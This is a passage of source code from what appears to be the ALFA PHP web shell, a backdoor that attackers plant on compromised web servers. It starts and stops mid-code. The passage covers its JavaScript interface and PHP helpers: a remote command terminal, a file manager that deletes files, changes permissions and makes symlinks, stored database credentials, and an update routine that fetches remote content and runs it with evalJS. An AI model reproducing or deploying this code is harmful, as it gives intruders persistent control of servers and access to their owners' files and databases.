.commands-history").insertAdjacentHTML("afterbegin","<div onclick=\\"d.querySelector(\'#"+i+\' .php-terminal-input\\\').value = this.innerHTML;" class="history-cmd-line">\'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=atob(t),t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+=\'<a base_id="\'+i+\'" fname="\'+t[s]+\'" path="\'+l+o+\'" onclick="alfaOpenArchive(this);">\'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows=\'<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>\',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+=\'<tr class="dbh_\'+o+\'"><th>\'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+\'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\\\'alfaConnectToDb("\'+o+\'","\'+a+\'");\\\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\\\'alfaDeleteConnectToDb("\'+o+"\\");\'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",btoa(JSON.stringify(a)),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\\"d.querySelector(\'#"+i+\' .php-terminal-input\\\').value = this.innerHTML;" class="history-cmd-line">\'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",btoa(JSON.stringify(o)),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",\'<div class="symlink_path" id="link_id_\'+a+\'">\'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML=\'<img draggable="false" title="\'+t.server.name+\'" src="http://solevisible.com/images/flags/48/\'+t.server.code.toLowerCase()+\'.png">\',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML=\'<img draggable="false" title="\'+t.client.name+\'" src="http://solevisible.com/images/flags/48/\'+t.client.code.toLowerCase()+\'.png">\',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor(\'"+a+"\',\'"+c+"\',\'\',\'\',\'\',\'file\')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm(\'Are You Sure For Delete # "+a+" # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'"+a+"\') : \'\';");break;case"download":s.setAttribute("onclick","g(\'FilesTools\',null,\'"+a+"\', \'download\')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",m=(c_+"/"+a).replace(/\\/\\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\\/\\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",\'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="\'+l+\'" id="filesman_tab_\'+o+\'" fm_id="\'+o+\'" onclick="filesmanTabController(this);" fname="\'+t+\'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">\'+i+\'</span> <img fm_id="\'+o+\'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>\'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",\'<div style="position:relative;" fm_id="\'+o+\'" id="filesman_holder_\'+o+\'" class="ajaxarea"><div class="header"></div></div>\'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\\{version\\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?\'<span class="header_values" style="margin-left: 4px;">\'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();\r\n\r\n</script>\r\n</body>\r\n</html>\r\n<?php\r\n}}\r\nif (!function_exists("posix_getpwuid") && (strpos(@ini_get(\'disable_functions\'), \'posix_getpwuid\')===false)) {\r\nfunction posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos(@ini_get(\'disable_functions\'), \'posix_getgrgid\')===false)) {\r\nfunction posix_getgrgid($p) {return false;} }\r\nfunction alfaWhich($p) {\r\n$path = alfaEx(\'which \' . $p,false,false);\r\nif(!empty($path))\r\nreturn strlen($path);\r\nreturn false;\r\n}\r\nfunction alfaSize($s) {\r\nif($s >= 1073741824)\r\nreturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\nelseif($s >= 1048576)\r\nreturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\nelseif($s >= 1024)\r\nreturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\nelse\r\nreturn $s . \' B\';\r\n}\r\nfunction alfaPerms($p) {\r\nif (($p & 0xC000) == 0xC000)$i = \'s​\';\r\nelseif (($p & 0xA000) == 0xA000)$i = \'l​\';\r\nelseif (($p & 0x8000) == 0x8000)$i = \'-​\';\r\nelseif (($p & 0x6000) == 0x6000)$i = \'b​\';\r\nelseif (($p & 0x4000) == 0x4000)$i = \'d​\';\r\nelseif (($p & 0x2000) == 0x2000)$i = \'c​\';\r\nelseif (($p & 0x1000) == 0x1000)$i = \'p​\';\r\nelse $i = \'u​\';\r\n$i .= (($p & 0x0100) ? \'r​\' : \'-\');\r\n$i .= (($p & 0x0080) ? \'w​\' : \'-\');\r\n$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s​\' : \'x​\' ) : (($p & 0x0800) ? \'S​\' : \'-\'));\r\n$i .= (($p & 0x0020) ? \'r​\' : \'-\');\r\n$i .= (($p & 0x0010) ? \'w​\' : \'-\');\r\n$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s​\' : \'x​\' ) : (($p & 0x0400) ? \'S​\' : \'-\'));\r\n$i .= (($p & 0x0004) ? \'r​\' : \'-\');\r\n$i .= (($p & 0x0002) ? \'w​\' : \'-\');\r\n$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t​\' : \'x​\' ) : (($p & 0x0200) ? \'T​\' : \'-\'));\r\nreturn $i;\r\n}\r\nfunction alfaPermsColor($f,$isbash=false){\r\n$class = "";\r\n$num = "";\r\n$human = "";\r\nif($isbash){\r\n$class = $f["class"];\r\n$num = $f["num"];\r\n$human = $f["human"];\r\n}else{\r\n$num = substr(sprintf(\'%o\', @fileperms($f)),-4);\r\n$human = alfaPerms(@fileperms($f));\r\nif(!@is_readable($f))\r\n$class = "main_red_perm";\r\nelseif (!@is_writable($f))\r\n$class = "main_white_perm";\r\nelse\r\n$class = "main_green_perm";\r\n}\r\nreturn \'<span style="font-weight:unset;" class="\'.$class.\'">\'.$num.\'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="\'.$class.\'">\'.$human.\'</span>\';\r\n}\r\nif(!function_exists("scandir")) {\r\nfunction scandir($dir) {\r\n$dh = opendir($dir);\r\nwhile (false !== ($filename = readdir($dh)))\r\n$files[] = $filename;\r\nreturn $files;\r\n}\r\n}\r\nfunction reArrayFiles($file_post){\r\n$file_ary = array();\r\n$file_count = count($file_post[\'name\']);\r\n$file_keys = array_keys($file_post);\r\nfor ($i=0; $i<$file_count; $i++) {\r\nforeach ($file_keys as $key) {\r\n$file_ary[$i][$key] = $file_post[$key][$i];\r\n}\r\n}\r\nreturn $file_ary;\r\n}\r\nfunction _alfa_can_runCommand($cgi=true,$cache=true){\r\n\tif(isset($_COOKIE["alfa_canruncmd"])&&$cache){\r\n\t\treturn true;\r\n\t}\r\n\tif(strlen(alfaEx("whoami",false,$cgi))>0){\r\n\t\t$_COOKIE["alfa_canruncmd"] = true;\r\n\t\treturn true;\r\n\t}\r\n\treturn false;\r\n}\r\nfunction _alfa_symlink($target, $link){\r\n\t$phpsym = function_exists("symlink");\r\n\tif($phpsym){\r\n\t\t@symlink($target, $link);\r\n\t}else{\r\n\t\talfaEx("ln -s \'".addslashes($target)."\' \'".addslashes($link)."\'");\r\n\t}\r\n}\r\nfunction _alfa_file_exists($file,$cgi=true){\r\n\tif(@file_exists($file)){\r\n\t\treturn true;\r\n\t}else{\r\n\t\tif(strlen(alfaEx("ls -la \'".addslashes($file)."\'",false,$cgi))>0){\r\n\t\t\treturn true;\r\n\t\t}\r\n\t}\r\n\treturn false;\r\n}\r\nfunction _alfa_file($file,$cgi=true){\r\n\t$array = @file($file);\r\n\tif(!$array){\r\n\t\tif(strlen(alfaEx("id",false,$cgi))>0){\r\n\t\t\t$data = alfaEx(\'cat "\'.addslashes($file).\'"\',false,$cgi);\r\n\t\t\tif(strlen($data)>0){\r\n\t\t\t\treturn explode("\\n", $data);\r\n\t\t\t}else{\r\n\t\t\t\treturn false;\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\treturn false;\r\n\t\t}\r\n\t}else{\r\n\t\treturn $array;\r\n\t}\r\n}\r\nfunction _alfa_is_writable($file){\r\n\t$check = false;\r\n\t$check = @is_writable($file);\r\n\tif(!$check){\r\n\t\tif(_alfa_can_runCommand()){\r\n\t\t\t$check = alfaEx(\'[ -w "\'.trim(addslashes($file)).\'" ] && echo "yes" || echo "no"\');\r\n\t\t\tif($check == "yes"){\r\n\t\t\t\t$check = true;\r\n\t\t\t}else{\r\n\t\t\t\t$check = false;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn $check;\r\n}\r\nfunction _alfa_is_dir($dir,$mode="-d"){\r\n\t$check = false;\r\n\t$check = @is_dir($dir);\r\n\tif($mode == "-e"){\r\n\t\t$check = @is_file($dir);\r\n\t}\r\n\tif(!$check){\r\n\t\tif(_alfa_can_runCommand()){\r\n\t\t\t$check = alfaEx(\'[ "\'.trim($mode).\'" "\'.trim(addslashes($dir)).\'" ] && echo "yes" || echo "no"\');\r\n\t\t\tif($check == "yes"){\r\n\t\t\t\treturn true;\r\n\t\t\t}else{\r\n\t\t\t\treturn false;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn $check;\r\n}\r\nfunction _alfa_load_ace_options($base){\r\n\treturn \'<span>Theme: </span><select class="ace-controler ace-theme-selector" base="\'.$base.\'" onChange="alfaAceChangeSetting(this,\\\'theme\\\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option 